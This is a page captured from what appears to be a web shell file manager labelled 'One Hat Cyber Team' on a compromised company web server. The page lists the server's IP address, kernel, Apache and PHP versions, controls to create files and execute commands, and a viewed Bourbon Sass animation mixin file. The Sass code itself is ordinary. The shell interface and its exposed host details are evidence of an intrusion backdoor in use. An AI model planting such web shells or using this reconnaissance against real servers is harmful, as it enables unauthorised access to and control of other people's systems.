⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.101
Server IP:
157.245.101.34
Server:
Linux skvinfotech-website 5.4.0-131-generic #147-Ubuntu SMP Fri Oct 14 17:07:22 UTC 2022 x86_64
Server Software:
Apache/2.4.41 (Ubuntu)
PHP Version:
7.4.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
var
/
www
/
skvcomputers.com
/
sass
/
bourbon
/
css3
/
View File Name :
_animation.scss
// http://www.w3.org/TR/css3-animations/#the-animation-name-property- // Each of these mixins support comma separated lists of values, which allows different transitions for individual properties to be described in a single style rule. Each value in the list corresponds to the value at that same position in the other properties. @mixin animation($animations...) { @include prefixer(animation, $animations, webkit moz spec); } @mixin animation-name($names...) { @include prefixer(animation-name, $names, webkit moz spec); } @mixin animation-duration($times...) { @include prefixer(animation-duration, $times, webkit moz spec); } @mixin animation-timing-function($motions...) { // ease | linear | ease-in | ease-out | ease-in-out @include prefixer(animation-timing-function, $motions, webkit moz spec); } @mixin animation-iteration-count($values...) { // infinite | <number> @include prefixer(animation-iteration-count, $values, webkit moz spec); } @mixin animation-direction($directions...) { // normal | alternate @include prefixer(animation-direction, $directions, webkit moz spec); } @mixin animation-play-state($states...) { // running | paused @include prefixer(animation-play-state, $states, webkit moz spec); } @mixin animation-delay($times...) { @include prefixer(animation-delay, $times, webkit moz spec); } @mixin animation-fill-mode($modes...) { // none | forwards | backwards | both @include prefixer(animation-fill-mode, $modes, webkit moz spec); }